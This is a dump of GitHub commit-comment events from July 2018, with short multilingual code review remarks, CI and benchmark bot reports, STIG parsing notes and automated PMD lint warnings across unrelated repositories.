{"id":"8014451956","type":"CommitCommentEvent","actor":{"login":"ngochai4404"},"repo":{"name":"ngochai4404/note"},"payload":{"comment":{"id":29824508,"position":17,"line":17,"path":"app/src/main/java/com/hai/note/activity/base/BaseActivity.java","commit_id":"1812d4a15c2f3d6081b770904f24a7b76a722eb5","created_at":"2018-07-25T06:34:08Z","updated_at":"2018-07-25T06:34:08Z","author_association":"OWNER","body":"Dạ vâng, cái đó lúc em lưu ảnh trên android 5.0 thì bình thường\nAndroid 7.0 thì bị crash , em lên stackoverflow thì có cách fix như vậy ạ\n\n\n2018-07-25 7:53 GMT+07:00 namhv <notifications@github.com>:\n\n> Anh comment code mà, có ảnh gì đâu, anh đang comment ở dòng 17:\n> StrictMode.VmPolicy.Builder builder = new StrictMode.VmPolicy.Builder();\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ngochai4404/note/commit/1812d4a15c2f3d6081b770904f24a7b76a722eb5#commitcomment-29822296>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ASqHNyDdTfkGDuEcmOlmykdvR87PHMieks5uJ8GdgaJpZM4VKn_U>\n> .\n>\n"}},"created_at":"2018-07-25T06:34:08Z"}
{"id":"8014456148","type":"CommitCommentEvent","actor":{"login":"wzyQD"},"repo":{"name":"wzyQD/learngit-1"},"payload":{"comment":{"id":29824513,"position":null,"line":null,"path":null,"commit_id":"74927258dc647bf51281f3f80eae8fae5f42b0d1","created_at":"2018-07-25T06:35:19Z","updated_at":"2018-07-25T06:35:19Z","author_association":"OWNER","body":"ccc"}},"created_at":"2018-07-25T06:35:19Z"}
{"id":"8014458835","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29824516,"position":null,"line":null,"path":null,"commit_id":"77342e2a9bd60aedb5ff62ab0e61bb349468cdd9","created_at":"2018-07-25T06:36:04Z","updated_at":"2018-07-25T06:36:04Z","author_association":"NONE","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/77342e2a9bd60aedb5ff62ab0e61bb349468cdd9#commitcomment-29823590) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/2372d02f36fb5914e96b55a388f187f6808e0145/daily_2018_7_25/report.md). cc @ararslan"}},"created_at":"2018-07-25T06:36:04Z"}
{"id":"8014459192","type":"CommitCommentEvent","actor":{"login":"tyrann0us"},"repo":{"name":"inpsyde/inpsyde-google-tag-manager"},"payload":{"comment":{"id":29824518,"position":10,"line":10,"path":"src/App/Provider.php","commit_id":"344e6d5da3a6a59acd02b875fa2ccc6654211070","created_at":"2018-07-25T06:36:10Z","updated_at":"2018-07-25T06:36:10Z","author_association":"MEMBER","body":"Wrong package name?"}},"created_at":"2018-07-25T06:36:10Z"}
{"id":"8014461071","type":"CommitCommentEvent","actor":{"login":"sameersbn"},"repo":{"name":"sameersbn/docker-gitlab"},"payload":{"comment":{"id":29824527,"position":null,"line":null,"path":null,"commit_id":"a28268c1194147ea3b7e232c644937d2a0eef9a0","created_at":"2018-07-25T06:36:40Z","updated_at":"2018-07-25T06:36:40Z","author_association":"OWNER","body":"the `sameersbn/postgresql` image automatically handles migration of existing postgres data between postgresql version upgrades. Having said that, we cannot discount that fact that it is always a good idea to create a backup before upgrading. So please remember to do that to avoid any unforeseen failures"}},"created_at":"2018-07-25T06:36:40Z"}
{"id":"8014462204","type":"CommitCommentEvent","actor":{"login":"ridouchire"},"repo":{"name":"MomozonoNanami/LandingPageTemplates"},"payload":{"comment":{"id":29824529,"position":53,"line":59,"path":"index.html","commit_id":"16c3ff5db62277b34187ab451a70755b82d39fca","created_at":"2018-07-25T06:36:59Z","updated_at":"2018-07-25T06:36:59Z","author_association":"NONE","body":"У тебя тут перед <i> отступ добавился."}},"created_at":"2018-07-25T06:36:59Z"}
{"id":"8014465118","type":"CommitCommentEvent","actor":{"login":"MeiGuddet"},"repo":{"name":"berlinux2016/MIUI10"},"payload":{"comment":{"id":29824535,"position":null,"line":null,"path":null,"commit_id":"9056ea9964f6a44338b437e9444dc2a44b08de7c","created_at":"2018-07-25T06:37:48Z","updated_at":"2018-07-25T06:37:48Z","author_association":"COLLABORATOR","body":"Ja, waren alle durcheinander, da kann man schlecht prüfen, ob alle strings da bzw. doppelte da sind.\r\nUnd das mit dem ein - ich hab alles mal so gelassen wie es war, obwohl ich das mit dem ein/eine gruselig finde für Aufzählungen. Man sollte bei one einfach den Platzhalter drin lassen wie es im im englischen Original auch ist (z. B. %1$d).\r\nvideo_play_count ist neu, alle Platzhalter vorhanden, nur übersetzt."}},"created_at":"2018-07-25T06:37:48Z"}
{"id":"8014466530","type":"CommitCommentEvent","actor":{"login":"skyemin"},"repo":{"name":"skyemin/hello-world"},"payload":{"comment":{"id":29824541,"position":null,"line":null,"path":null,"commit_id":"68ef908aa2c443b6b6e00334f1392b29cb9a6804","created_at":"2018-07-25T06:38:12Z","updated_at":"2018-07-25T06:38:12Z","author_association":"OWNER","body":"哈哈哈"}},"created_at":"2018-07-25T06:38:12Z"}
{"id":"8014466863","type":"CommitCommentEvent","actor":{"login":"Sirhc95"},"repo":{"name":"CypherOS/device_motorola_shamu"},"payload":{"comment":{"id":29824542,"position":null,"line":null,"path":null,"commit_id":"77c37ce6e9b2c8373853f2a4ee6686da18b98719","created_at":"2018-07-25T06:38:18Z","updated_at":"2018-07-25T06:38:18Z","author_association":"CONTRIBUTOR","body":"Oh lol, im merely screwing around to redo the tree"}},"created_at":"2018-07-25T06:38:18Z"}
{"id":"8014467321","type":"CommitCommentEvent","actor":{"login":"camusicjunkie"},"repo":{"name":"camusicjunkie/PowerStig"},"payload":{"comment":{"id":29824543,"position":15,"line":46,"path":"Module/Common/Function.RangeConversion.ps1","commit_id":"4c9d1afc1e5212616f58d912db3120fe4ae3a556","created_at":"2018-07-25T06:38:25Z","updated_at":"2018-07-25T06:38:25Z","author_association":"OWNER","body":"Created new function Test-StringIsLessThanOrEqualExcluding to account for the excluding verbiage in V-63661 in the Windows 10 STIG."}},"created_at":"2018-07-25T06:38:25Z"}
{"id":"8014468134","type":"CommitCommentEvent","actor":{"login":"camusicjunkie"},"repo":{"name":"camusicjunkie/PowerStig"},"payload":{"comment":{"id":29824544,"position":27,"line":85,"path":"Module/Common/Function.RangeConversion.ps1","commit_id":"4c9d1afc1e5212616f58d912db3120fe4ae3a556","created_at":"2018-07-25T06:38:40Z","updated_at":"2018-07-25T06:38:40Z","author_association":"OWNER","body":"Modified the logic here to account for V-63661 in the Windows 10 STIG and V-73641 in the Server 2016 STIG. Both of these rules evaluate to $true when testing for a range but would only output one number because they started with a hex value. This would cause the organization settings to not parse correctly."}},"created_at":"2018-07-25T06:38:40Z"}
{"id":"8014468580","type":"CommitCommentEvent","actor":{"login":"kkapsner"},"repo":{"name":"kkapsner/CanvasBlocker"},"payload":{"comment":{"id":29824548,"position":null,"line":null,"path":null,"commit_id":"9a26baf5c1fc35ae3dc6d3af57a8c93cead73cc9","created_at":"2018-07-25T06:38:48Z","updated_at":"2018-07-25T06:38:48Z","author_association":"OWNER","body":"Mann... zur Zeit ist meine Orthographie aber noch schlechter als sonst..."}},"created_at":"2018-07-25T06:38:48Z"}
{"id":"8014468892","type":"CommitCommentEvent","actor":{"login":"camusicjunkie"},"repo":{"name":"camusicjunkie/PowerStig"},"payload":{"comment":{"id":29824551,"position":43,"line":186,"path":"Module/Common/Function.RangeConversion.ps1","commit_id":"4c9d1afc1e5212616f58d912db3120fe4ae3a556","created_at":"2018-07-25T06:38:53Z","updated_at":"2018-07-25T06:38:53Z","author_association":"OWNER","body":"This check accounts for the excluding verbiage in a range."}},"created_at":"2018-07-25T06:38:53Z"}
{"id":"8014469207","type":"CommitCommentEvent","actor":{"login":"GaryC1"},"repo":{"name":"GaryC1/wiki"},"payload":{"comment":{"id":29824552,"position":null,"line":null,"path":null,"commit_id":"dcb608f9c354d39c9e9b3648103822e52fcb7005","created_at":"2018-07-25T06:38:59Z","updated_at":"2018-07-25T06:38:59Z","author_association":"OWNER","body":"提交Gary●C共识机制文档"}},"created_at":"2018-07-25T06:38:59Z"}
{"id":"8014469911","type":"CommitCommentEvent","actor":{"login":"camusicjunkie"},"repo":{"name":"camusicjunkie/PowerStig"},"payload":{"comment":{"id":29824555,"position":80,"line":667,"path":"Module/Common/Function.RangeConversion.ps1","commit_id":"4c9d1afc1e5212616f58d912db3120fe4ae3a556","created_at":"2018-07-25T06:39:11Z","updated_at":"2018-07-25T06:39:11Z","author_association":"OWNER","body":"Added an extra regex check for rule V-73641 where the value started with a hex value and the number was wrapped in parenthesis.\r\n\r\nex. 0x0000001e (30) (or less, but not 0)"}},"created_at":"2018-07-25T06:39:11Z"}
{"id":"8014471834","type":"CommitCommentEvent","actor":{"login":"camusicjunkie"},"repo":{"name":"camusicjunkie/PowerStig"},"payload":{"comment":{"id":29824556,"position":13,"line":282,"path":"Tests/Unit/Module/Common.tests.ps1","commit_id":"4c9d1afc1e5212616f58d912db3120fe4ae3a556","created_at":"2018-07-25T06:39:43Z","updated_at":"2018-07-25T06:39:43Z","author_association":"OWNER","body":"Added Test-StringIsLessThanOrEqualExcluding to test."}},"created_at":"2018-07-25T06:39:43Z"}
{"id":"8014473743","type":"CommitCommentEvent","actor":{"login":"camusicjunkie"},"repo":{"name":"camusicjunkie/PowerStig"},"payload":{"comment":{"id":29824560,"position":39,"line":321,"path":"Tests/Unit/Module/Common.tests.ps1","commit_id":"4c9d1afc1e5212616f58d912db3120fe4ae3a556","created_at":"2018-07-25T06:40:15Z","updated_at":"2018-07-25T06:40:15Z","author_association":"OWNER","body":"Added string to account for V-73641 where a hex value existed in a value that was also a range."}},"created_at":"2018-07-25T06:40:15Z"}
{"id":"8014474814","type":"CommitCommentEvent","actor":{"login":"Sirhc95"},"repo":{"name":"CypherOS/device_motorola_shamu"},"payload":{"comment":{"id":29824563,"position":null,"line":null,"path":null,"commit_id":"cdcc2b30602d17f71bd6d43b357e311f8eacd67b","created_at":"2018-07-25T06:40:32Z","updated_at":"2018-07-25T06:40:32Z","author_association":"CONTRIBUTOR","body":"Whoops bad pick, thanks"}},"created_at":"2018-07-25T06:40:32Z"}
{"id":"8014478675","type":"CommitCommentEvent","actor":{"login":"camusicjunkie"},"repo":{"name":"camusicjunkie/PowerStig"},"payload":{"comment":{"id":29824567,"position":104,"line":691,"path":"Module/Common/Function.RangeConversion.ps1","commit_id":"4c9d1afc1e5212616f58d912db3120fe4ae3a556","created_at":"2018-07-25T06:41:32Z","updated_at":"2018-07-25T06:41:32Z","author_association":"OWNER","body":"Added Test-StringIsLessThanOrEqualExcluding function"}},"created_at":"2018-07-25T06:41:32Z"}
{"id":"8014480531","type":"CommitCommentEvent","actor":{"login":"AL316814"},"repo":{"name":"AL316814/PES-Python-Assignments-3x"},"payload":{"comment":{"id":29824568,"position":null,"line":null,"path":null,"commit_id":"479b3e35abeaa984332c15fb777e3dc077e7e9c8","created_at":"2018-07-25T06:42:03Z","updated_at":"2018-07-25T06:42:03Z","author_association":"OWNER","body":"[Python Assignment.docx](https://github.com/AL316814/PES-Python-Assignments-3x/files/2226796/Python.Assignment.docx)\r\n"}},"created_at":"2018-07-25T06:42:03Z"}
{"id":"8014483469","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29824570,"position":null,"line":null,"path":null,"commit_id":"dcd5484ff780dae0370be66abc18c4a631362d86","created_at":"2018-07-25T06:42:49Z","updated_at":"2018-07-25T06:42:49Z","author_association":"OWNER","body":"Ya doomal cherez initialize budet proshe eto delat ved tam my tolko v odnom meste modulya ispolzuem a tut nuzhno budet vezde dobavlyat rescue...."}},"created_at":"2018-07-25T06:42:49Z"}
{"id":"8014484396","type":"CommitCommentEvent","actor":{"login":"lurr"},"repo":{"name":"tmpim/luadash"},"payload":{"comment":{"id":29824572,"position":6,"line":6,"path":"doc/sort.txt","commit_id":"b31ef6475b3bc448e77c8c7d2131147f883df449","created_at":"2018-07-25T06:43:03Z","updated_at":"2018-07-25T06:43:03Z","author_association":"NONE","body":"`_.sort_with` doesn't exist- this should be `_.sort_by`"}},"created_at":"2018-07-25T06:43:03Z"}
{"id":"8014484444","type":"CommitCommentEvent","actor":{"login":"mptre"},"repo":{"name":"google/syzkaller"},"payload":{"comment":{"id":29824573,"position":4,"line":268,"path":"Makefile","commit_id":"da1670a69dbf57da6f6578ae001df1fad1d947ef","created_at":"2018-07-25T06:43:04Z","updated_at":"2018-07-25T06:43:04Z","author_association":"CONTRIBUTOR","body":"Won't the backslash cause the following line to be joined?"}},"created_at":"2018-07-25T06:43:04Z"}
{"id":"8014486432","type":"CommitCommentEvent","actor":{"login":"lordvlad"},"repo":{"name":"sameersbn/docker-gitlab"},"payload":{"comment":{"id":29824575,"position":null,"line":null,"path":null,"commit_id":"a28268c1194147ea3b7e232c644937d2a0eef9a0","created_at":"2018-07-25T06:43:36Z","updated_at":"2018-07-25T06:43:36Z","author_association":"CONTRIBUTOR","body":"Thanks!"}},"created_at":"2018-07-25T06:43:36Z"}
{"id":"8014489900","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29824584,"position":null,"line":null,"path":null,"commit_id":"a4508636e854d4190987978ddb842d1ac719bee2","created_at":"2018-07-25T06:44:33Z","updated_at":"2018-07-25T06:44:33Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#pr-154](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#pr-154).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-154-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-25T06:44:33Z"}
{"id":"8014493251","type":"CommitCommentEvent","actor":{"login":"bojidar-bg"},"repo":{"name":"ddnet/ddnet"},"payload":{"comment":{"id":29824588,"position":null,"line":null,"path":null,"commit_id":"d08f03fecf16256b7333855edf617f4b9a6d8466","created_at":"2018-07-25T06:45:25Z","updated_at":"2018-07-25T06:45:25Z","author_association":"CONTRIBUTOR","body":"Given that the \"kitty\", etc. options did not hide/transform non-kitty skins in the picker, I decided to leave it the same with vanilla skins."}},"created_at":"2018-07-25T06:45:25Z"}
{"id":"8014499120","type":"CommitCommentEvent","actor":{"login":"sushant-115"},"repo":{"name":"sushant-115/log-demo-server"},"payload":{"comment":{"id":29824595,"position":null,"line":null,"path":null,"commit_id":"3988dfd9a8d6971af412522af9eb66f8d5402fa7","created_at":"2018-07-25T06:46:58Z","updated_at":"2018-07-25T06:46:58Z","author_association":"OWNER","body":"Merge branch to-do"}},"created_at":"2018-07-25T06:46:58Z"}
{"id":"8014499985","type":"CommitCommentEvent","actor":{"login":"ffjjhfgjhrtuyruydfhgdc"},"repo":{"name":"ffjjhfgjhrtuyruydfhgdc/anti-spam"},"payload":{"comment":{"id":29824596,"position":null,"line":null,"path":null,"commit_id":"24679ea63dce352648c33b3565dc4692c6e30ad2","created_at":"2018-07-25T06:47:12Z","updated_at":"2018-07-25T06:47:12Z","author_association":"OWNER","body":"ضد لینک"}},"created_at":"2018-07-25T06:47:12Z"}
{"id":"8014503592","type":"CommitCommentEvent","actor":{"login":"wentasah"},"repo":{"name":"Shanigen/kcf"},"payload":{"comment":{"id":29824605,"position":null,"line":null,"path":null,"commit_id":"0ea3f2ebb0143bd2e13daa66f673f881e8fe8efd","created_at":"2018-07-25T06:48:12Z","updated_at":"2018-07-25T06:48:12Z","author_association":"COLLABORATOR","body":"Good, but commit message should first say what the commit does and then (perhaps on separate line) that it closes an issue."}},"created_at":"2018-07-25T06:48:12Z"}
{"id":"8014504890","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"energy-plus/EnergyPlus"},"payload":{"comment":{"id":29824607,"position":null,"line":null,"path":null,"commit_id":"fc1b41bea3db8faffec69bf84e79a557a8c8127a","created_at":"2018-07-25T06:48:33Z","updated_at":"2018-07-25T06:48:33Z","author_association":"NONE","body":"CoilHackathonBranch1 (energy-plus) - i386-Windows-7-VisualStudio-14: OK (2942 of 2948 tests passed, 17 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 5 tests had: EIO diffs.\n * 2 tests had: ERR diffs.\n * 4 tests had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 5 tests had: Table big diffs.\n * 4 tests had: MTR small diffs.\n * 2 tests had: Table small diffs.\n * 5 tests had: ESO small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 617\n * Failed: 6\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc1b41bea3db8faffec69bf84e79a557a8c8127a-PR6846-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc1b41bea3db8faffec69bf84e79a557a8c8127a-PR6846-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.8%25-yellow.png)</a> \n"}},"created_at":"2018-07-25T06:48:33Z"}
{"id":"8014506711","type":"CommitCommentEvent","actor":{"login":"HanSolo"},"repo":{"name":"HanSolo/tilesfx"},"payload":{"comment":{"id":29824610,"position":null,"line":null,"path":null,"commit_id":"37f823d8c77c60915847395d3bd6b096ade949a6","created_at":"2018-07-25T06:49:01Z","updated_at":"2018-07-25T06:49:01Z","author_association":"OWNER","body":"you might want to take a look at the tilesfx demo project: https://github.com/HanSolo/tilesfxdemo"}},"created_at":"2018-07-25T06:49:01Z"}
{"id":"8014509594","type":"CommitCommentEvent","actor":{"login":"hadv"},"repo":{"name":"nextyio/NextyBonus"},"payload":{"comment":{"id":29824612,"position":6,"line":13,"path":"contracts/NextyBonus.sol","commit_id":"1a9406766db7c50e25e9b13934e6123a4c7154eb","created_at":"2018-07-25T06:49:45Z","updated_at":"2018-07-25T06:49:45Z","author_association":"MEMBER","body":"you can use simple as `180 days`\r\n\r\nsame for `365 days`"}},"created_at":"2018-07-25T06:49:45Z"}
{"id":"8014509681","type":"CommitCommentEvent","actor":{"login":"andypalmer"},"repo":{"name":"Becca9941/portfolio-webdevbecca"},"payload":{"comment":{"id":29824613,"position":159,"line":142,"path":"index.php","commit_id":"1cc74e957664fdbd7134a07846aac7b85f281d8f","created_at":"2018-07-25T06:49:47Z","updated_at":"2018-07-25T06:49:47Z","author_association":"NONE","body":"I can see that you've stored your date as YYYYMMDD. You can use http://php.net/manual/en/datetime.createfromformat.php to create an actual date object, and you can use $date->format() to output it how you like"}},"created_at":"2018-07-25T06:49:47Z"}
{"id":"8014509699","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29824614,"position":251,"line":null,"path":"app/src/at-lambui/java/asiantech/internship/summer/retrofitandgson/RestfulActivity.java","commit_id":"166f7f5b77aafd15b504676fc11fa753363520b7","created_at":"2018-07-25T06:49:47Z","updated_at":"2018-07-25T06:49:47Z","author_association":"NONE","body":"WARNING: [AvoidPrintStackTrace] Avoid printStackTrace(); use a logger call instead.\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/logging-java.html#AvoidPrintStackTrace"}},"created_at":"2018-07-25T06:49:47Z"}
{"id":"8014509715","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29824615,"position":15,"line":null,"path":"app/src/at-lambui/java/asiantech/internship/summer/retrofitandgson/adapter/ListImageAdapter.java","commit_id":"166f7f5b77aafd15b504676fc11fa753363520b7","created_at":"2018-07-25T06:49:47Z","updated_at":"2018-07-25T06:49:47Z","author_association":"NONE","body":"WARNING: [UnusedImports] Avoid unused imports such as 'asiantech.internship.summer.recyclerview.adapter.ListViewHolder'\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/imports.html#UnusedImports"}},"created_at":"2018-07-25T06:49:47Z"}
{"id":"8014509725","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29824616,"position":16,"line":null,"path":"app/src/at-lambui/java/asiantech/internship/summer/retrofitandgson/adapter/ListImageAdapter.java","commit_id":"166f7f5b77aafd15b504676fc11fa753363520b7","created_at":"2018-07-25T06:49:47Z","updated_at":"2018-07-25T06:49:47Z","author_association":"NONE","body":"WARNING: [UnusedImports] Avoid unused imports such as 'asiantech.internship.summer.retrofitandgson.model.CustomImage'\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/imports.html#UnusedImports"}},"created_at":"2018-07-25T06:49:47Z"}
{"id":"8014509735","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29824617,"position":8,"line":null,"path":"app/src/at-lambui/java/asiantech/internship/summer/retrofitandgson/api/DownloadImageAPI.java","commit_id":"166f7f5b77aafd15b504676fc11fa753363520b7","created_at":"2018-07-25T06:49:47Z","updated_at":"2018-07-25T06:49:47Z","author_association":"NONE","body":"WARNING: [UnusedImports] Avoid unused imports such as 'retrofit2.http.Query'\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/imports.html#UnusedImports"}},"created_at":"2018-07-25T06:49:47Z"}
{"id":"8014509742","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29824618,"position":3,"line":null,"path":"app/src/at-lambui/java/asiantech/internship/summer/retrofitandgson/api/UploadImageAPI.java","commit_id":"166f7f5b77aafd15b504676fc11fa753363520b7","created_at":"2018-07-25T06:49:48Z","updated_at":"2018-07-25T06:49:48Z","author_association":"NONE","body":"WARNING: [UnusedImports] Avoid unused imports such as 'java.util.List'\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/imports.html#UnusedImports"}},"created_at":"2018-07-25T06:49:48Z"}
{"id":"8014509749","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29824619,"position":6,"line":null,"path":"app/src/at-lambui/java/asiantech/internship/summer/retrofitandgson/api/UploadImageAPI.java","commit_id":"166f7f5b77aafd15b504676fc11fa753363520b7","created_at":"2018-07-25T06:49:48Z","updated_at":"2018-07-25T06:49:48Z","author_association":"NONE","body":"WARNING: [UnusedImports] Avoid unused imports such as 'asiantech.internship.summer.retrofitandgson.model.Image'\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/imports.html#UnusedImports"}},"created_at":"2018-07-25T06:49:48Z"}
{"id":"8014509764","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29824620,"position":13,"line":null,"path":"app/src/at-lambui/java/asiantech/internship/summer/retrofitandgson/api/UploadImageAPI.java","commit_id":"166f7f5b77aafd15b504676fc11fa753363520b7","created_at":"2018-07-25T06:49:48Z","updated_at":"2018-07-25T06:49:48Z","author_association":"NONE","body":"WARNING: [UnusedImports] Avoid unused imports such as 'retrofit2.http.Query'\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/imports.html#UnusedImports"}},"created_at":"2018-07-25T06:49:48Z"}
{"id":"8014509770","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29824621,"position":15,"line":null,"path":"app/src/at-lambui/java/asiantech/internship/summer/retrofitandgson/api/UploadImageAPI.java","commit_id":"166f7f5b77aafd15b504676fc11fa753363520b7","created_at":"2018-07-25T06:49:48Z","updated_at":"2018-07-25T06:49:48Z","author_association":"NONE","body":"WARNING: [UnusedImports] Avoid unused imports such as 'asiantech.internship.summer.retrofitandgson.api.DownloadImageAPI.access_token'\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/imports.html#UnusedImports"}},"created_at":"2018-07-25T06:49:48Z"}
{"id":"8014509782","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29824622,"position":19,"line":null,"path":"app/src/at-lambui/java/asiantech/internship/summer/retrofitandgson/model/CustomImage.java","commit_id":"166f7f5b77aafd15b504676fc11fa753363520b7","created_at":"2018-07-25T06:49:48Z","updated_at":"2018-07-25T06:49:48Z","author_association":"NONE","body":"ERROR: [MethodNamingConventions] Method names should not contain underscores\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/naming.html#MethodNamingConventions"}},"created_at":"2018-07-25T06:49:48Z"}
{"id":"8014509798","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29824623,"position":23,"line":null,"path":"app/src/at-lambui/java/asiantech/internship/summer/retrofitandgson/model/CustomImage.java","commit_id":"166f7f5b77aafd15b504676fc11fa753363520b7","created_at":"2018-07-25T06:49:48Z","updated_at":"2018-07-25T06:49:48Z","author_association":"NONE","body":"ERROR: [MethodNamingConventions] Method names should not contain underscores\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/naming.html#MethodNamingConventions"}},"created_at":"2018-07-25T06:49:48Z"}
{"id":"8014509814","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29824624,"position":27,"line":null,"path":"app/src/at-lambui/java/asiantech/internship/summer/retrofitandgson/model/CustomImage.java","commit_id":"166f7f5b77aafd15b504676fc11fa753363520b7","created_at":"2018-07-25T06:49:49Z","updated_at":"2018-07-25T06:49:49Z","author_association":"NONE","body":"ERROR: [MethodNamingConventions] Method names should not contain underscores\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/naming.html#MethodNamingConventions"}},"created_at":"2018-07-25T06:49:49Z"}
{"id":"8014509826","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29824625,"position":31,"line":null,"path":"app/src/at-lambui/java/asiantech/internship/summer/retrofitandgson/model/CustomImage.java","commit_id":"166f7f5b77aafd15b504676fc11fa753363520b7","created_at":"2018-07-25T06:49:49Z","updated_at":"2018-07-25T06:49:49Z","author_association":"NONE","body":"ERROR: [MethodNamingConventions] Method names should not contain underscores\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/naming.html#MethodNamingConventions"}},"created_at":"2018-07-25T06:49:49Z"}
{"id":"8014509841","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29824626,"position":35,"line":null,"path":"app/src/at-lambui/java/asiantech/internship/summer/retrofitandgson/model/CustomImage.java","commit_id":"166f7f5b77aafd15b504676fc11fa753363520b7","created_at":"2018-07-25T06:49:49Z","updated_at":"2018-07-25T06:49:49Z","author_association":"NONE","body":"ERROR: [MethodNamingConventions] Method names should not contain underscores\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/naming.html#MethodNamingConventions"}},"created_at":"2018-07-25T06:49:49Z"}
{"id":"8014509851","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29824627,"position":39,"line":null,"path":"app/src/at-lambui/java/asiantech/internship/summer/retrofitandgson/model/CustomImage.java","commit_id":"166f7f5b77aafd15b504676fc11fa753363520b7","created_at":"2018-07-25T06:49:49Z","updated_at":"2018-07-25T06:49:49Z","author_association":"NONE","body":"ERROR: [MethodNamingConventions] Method names should not contain underscores\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/naming.html#MethodNamingConventions"}},"created_at":"2018-07-25T06:49:49Z"}
{"id":"8014509874","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29824628,"position":22,"line":null,"path":"app/src/at-lambui/java/asiantech/internship/summer/retrofitandgson/model/Image.java","commit_id":"166f7f5b77aafd15b504676fc11fa753363520b7","created_at":"2018-07-25T06:49:49Z","updated_at":"2018-07-25T06:49:49Z","author_association":"NONE","body":"ERROR: [MethodNamingConventions] Method names should not contain underscores\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/naming.html#MethodNamingConventions"}},"created_at":"2018-07-25T06:49:49Z"}
{"id":"8014509888","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29824629,"position":26,"line":null,"path":"app/src/at-lambui/java/asiantech/internship/summer/retrofitandgson/model/Image.java","commit_id":"166f7f5b77aafd15b504676fc11fa753363520b7","created_at":"2018-07-25T06:49:49Z","updated_at":"2018-07-25T06:49:49Z","author_association":"NONE","body":"ERROR: [MethodNamingConventions] Method names should not contain underscores\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/naming.html#MethodNamingConventions"}},"created_at":"2018-07-25T06:49:49Z"}
